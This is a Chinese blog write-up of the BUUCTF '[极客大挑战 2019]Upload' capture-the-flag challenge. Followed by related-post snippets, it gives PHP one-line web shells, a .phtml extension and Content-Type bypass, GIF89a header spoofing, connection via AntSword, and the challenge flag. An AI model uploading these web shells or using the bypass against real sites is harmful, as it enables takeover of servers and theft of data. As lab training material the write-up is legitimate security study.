[极客大挑战 2019]Upload

最新推荐文章于 2024-10-10 10:17:26 发布
最新推荐文章于 2024-10-10 10:17:26 发布
阅读量512 收藏
点赞数 14
分类专栏: CTF 文章标签: android android studio ide
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_77380355/article/details/137150294
版权

需要上传图片

尝试上传一句话木马

<?php eval($_POST['b'])?>
<?php $_GET['a']($_POST['b'])?>

 

 显示错误,需要上传图像

1.使用burpsuite拦截,修改文件类型绕过,需把上传的文件后缀改成phtml否则木马无法运行

显示文件不能包含<?

换一种一句话木马

<script language="php">eval($_REQUEST[1])</script>

看来仅仅更改文件后缀不能完全绕过,这里使用GIF89a头文件欺骗

成功上传

现在需要知道图片的所在路径,因为图片一般在upload/filename

尝试访问

直接用蚁剑连接

URL地址为原地址加/upload/你上传的文件名

,密码为你REQUEST里的数

连接成功,在根目录找到flag

flag{8109dc7c-3973-4be5-a5f9-7c9dfd6e91eb}

关注
专栏目录
极客挑战 2019 Upload 1
qq_52715164的博客
04-20 2540
还是文件上传得题,上传有一句话木马写的且改后缀为jpg得文件,会出现提示说文件包含`<?传不了,所以修改木马为: GIF89a? <script language="php">eval($_REQUEST[123])</script> 打开burp,抓包修改文件后缀, 发现php上传不了, 常规文件后缀为: php2, php3, php4, php5, phps, pht, phtm, phtml 这里修改后缀为:phtml可正常上传 但上传后没有返回图片保存地址,一般上
【BUUCTF]极客挑战 2019Upload1 write up
GZWZ_的博客
04-23 995
文件上传冲啊!!!!!!
极客挑战2019-upload
m0_73303597的博客
12-11 369
自用
[极客挑战 2019]Upload--BUUCTF
XiaoYeZhu_1314的博客
04-24 593
添加头文件:GIF89a改文件格式为image/jpegcheck。
[极客挑战 2019]Upload 1
徐海洋
02-02 704
[极客挑战 2019]Upload 1
BUUFCTF—[极客挑战 2019]Upload 1
内心不种满鲜花就会长满杂草
05-12 1182
上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。
[极客挑战 2019]Upload1(详解)
2301_77451464的博客
02-04 912
这句话是不应该出现的,可能是文件名后缀不对,放在蚁剑上,发现不能打开。由此可知,图片是有一个图片头的,可以用010editer打开看一下。文件名demo.php。图片头为GIF89a。
BUUCTF [极客挑战 2019]Upload
m0_49025459的博客
05-12 5190
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
极客挑战2019Upload解题
Bird&Bird
10-26 3875
1、打开BUUCTF在线评测,选择web---->【极客挑战2019Upload。 2、首先上一句话木马。 报错了,说明进行了前端过滤非图片格式文件。 3、 将文件后缀名改为.jpg后在上传。 报错,说明进行了后端过滤,文件内容不能包含'<?'。 4、修改文件内容,然后上传。 继续报错 应该是对图片头进行了校验,那添加图片头,然后上传。 终于上传成功了,但此时我们上传的是一个.jpg图片,利用不了。 5、通过bp抓包,并修改图片后...
[极客挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
【BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1119
Upload=> 文件上传漏洞。
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 903
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
android 全面屏最底部栏沉浸式
sdaujz的博客
10-04 433
Android 系统 Bar 沉浸式完美兼容方案自 Android 5.0 版本,Android 带来了沉浸式系统 ba - 掘金 (juejin.cn)Activity的onCreate方法中添加。
Android 编译使用哪个key签名?
最新发布
m0_63526467的博客
10-10 518
Android 编译使用哪个key签名?
20241004给荣品RD-RK3588-AHD开发板刷Rockchip原厂的Android12【HDMI0显示】
南岭笑笑生之家
10-04 1806
Z:\82临时了evb4+rp3588s_android12\kernel-5.10\arch\arm64\boot\dts\rockchip\rd-rk3588s-AHD.dts。Z:\82临时了evb4+rp3588s_android12\kernel-5.10\arch\arm64\boot\dts\rockchip\rp-lcd-hdmi0.dtsi。1、配置RK3588S的默认DTS为:rk3588s-evb4-lp4x-v10.dts。【Android12需要】配置为默认HDMI0显示。
PHP中for 和 foreach 有什么区别
sheji888的专栏
10-07 860
for和foreach是PHP中两种常用的循环控制结构,它们各自具有独特的特点和适用场景。for循环更加灵活,适用于需要明确控制循环次数或进行复杂计算的场景;而foreach循环则更加简洁直观,主要用于遍历数组或对象集合。在选择循环结构时,应根据具体需求和场景进行权衡和选择。同时,需要注意避免在foreach循环中直接修改原数组,以免导致不可预测的行为。
20241004给荣品RD-RK3588-AHD开发板刷Rockchip原厂的Android12时永不休眠的步骤
南岭笑笑生之家
10-04 1333
20241004给荣品RD-RK3588-AHD开发板刷Rockchip原厂的Android12时永不休眠的步骤。【可以/可选尝试在DTS配置suspend的状态为:disabled】切换到dream_timeout资源,这里边有永不休眠的选项;RK3588-ANDROID12-永不息屏,不锁屏。Android11 设置菜单添加永不休眠选项。3、【改两个地方,但是只修改这里无效!RK3568-ANDROID11-不息屏。rk平台Android12屏幕永不休眠。
极客挑战 2019]EasySQL
09-03
EasySQL 是极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值